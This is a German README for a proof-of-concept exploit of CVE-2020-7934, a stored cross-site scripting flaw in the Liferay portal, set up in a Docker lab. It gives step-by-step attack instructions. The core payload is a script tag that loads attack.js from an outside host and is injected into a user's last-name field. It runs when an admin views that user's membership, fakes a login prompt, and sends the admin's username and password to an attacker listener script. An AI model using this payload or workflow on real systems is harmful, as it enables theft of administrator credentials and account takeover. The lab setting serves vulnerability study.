CVE 2020-7934
So führen Sie den CVE aus
Anforderungen
- docker
Hinweise
Es ist möglich, das Angriffsskript online zu stellen (mit dem JS-Code) http://yourjavascript.com/
Unser JS-Skript online für den Angriff
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
Befehle für die Konfiguration
- Gehen Sie zum Hauptordner dieses Projekts
- führen Sie "sudo docker-compose up --build" aus
- neues Terminal: führen Sie "docker inspect liferay" aus ==> und kopieren Sie den IPAddress-Wert
- neues Terminal: führen Sie "python api_attacker.py" aus
- öffnen Sie einen Browser und gehen Sie zu "http://IPAddress:8080" ==> Sie sollten das Liferay-Portal als Antwort erhalten
- um Container zu stoppen und zu löschen, verwenden Sie "sudo docker-compose rm"
Anweisungen für den Angriff
- Registrieren Sie sich in Liferay als Benutzer, melden Sie sich an und treten Sie im Abschnitt "verfügbare Sites" der Site "liferay" bei.
- Ändern Sie den "Nachnamen" in einem JS-Skript (direkt () oder über ein "src =" http ... "")
- Melden Sie sich als Liferay-Admin an (Benutzername: [email protected], Passwort: test)
- Gehen Sie zu den verfügbaren Sites und klicken Sie auf "liferay", die öffentliche Seite dieser Site wird geöffnet.
- Gehen Sie zur neuen Seite, ein Menü öffnet sich auf der rechten Seite, klicken Sie auf Mitgliedschaft.
- Wählen Sie den in Schritt 1 registrierten Benutzer aus. In diesem Moment wird das Skript ausgeführt.
5.1) Im Skript attack.js fragt die Seite nach den Anmeldeinformationen.
- Im Terminal von Schritt 5 (von "Befehle für die Konfiguration") werden Benutzername/Passwort ausgegeben, die in 5.1 eingegeben wurden (vom Admin).